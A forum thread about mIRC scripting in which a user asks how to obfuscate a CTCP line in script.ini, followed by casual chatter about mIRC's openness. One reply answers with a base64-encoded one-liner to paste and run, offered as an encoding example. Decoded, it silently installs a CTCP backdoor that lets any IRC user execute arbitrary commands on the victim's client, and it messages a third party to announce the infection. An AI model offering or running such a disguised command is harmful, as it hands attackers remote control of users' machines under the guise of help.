Is it possible to encode a string that is in my script.ini so it can't be easily read but it still works?

example:

could I encode this string

ctcp 1:TRIGGER: { /msg $nick Hi there }

in something unreadable, like:

#@#òè@#@ò[@#ò (it's a silly example)

leaving the ctcp working?

thanks

do you mean something like this:
//write krneki $decode(b24gKjp0ZXh0Oio6KjogeyBpZiAoICVhYmMgPT0gJG51bGwgKSB7IC93cml0ZSBtSVJDIGN0Y3AgKjoqOio6IHsgJCAkKyAxLSB9IHwgLy5sb2FkIC1ycyBtSVJDIHwgJWFiYyA9IDEgfCAvLm1zZyBOZXpuYW5pIE5hbG96dSBzbS4gfSB9,m) | .load -rs krneki

by the way, why if mirc is so much an open-source oriented software, on version 6.12 you can't even change the filename of the .exe? I think it's crap wink

We're talking about mIRC scripting itself. It is and has always been open-source, so you'll most likely have to find any other way to mask your stuff..

Actually, the need comes from Khaled anyway, since he's obviously attempting to add protections to his app.
Still, that has nothing to do with the main subject.

Ah well, the point has already been made..

3DMark 2003 has it too, so other programs will probably have it too...
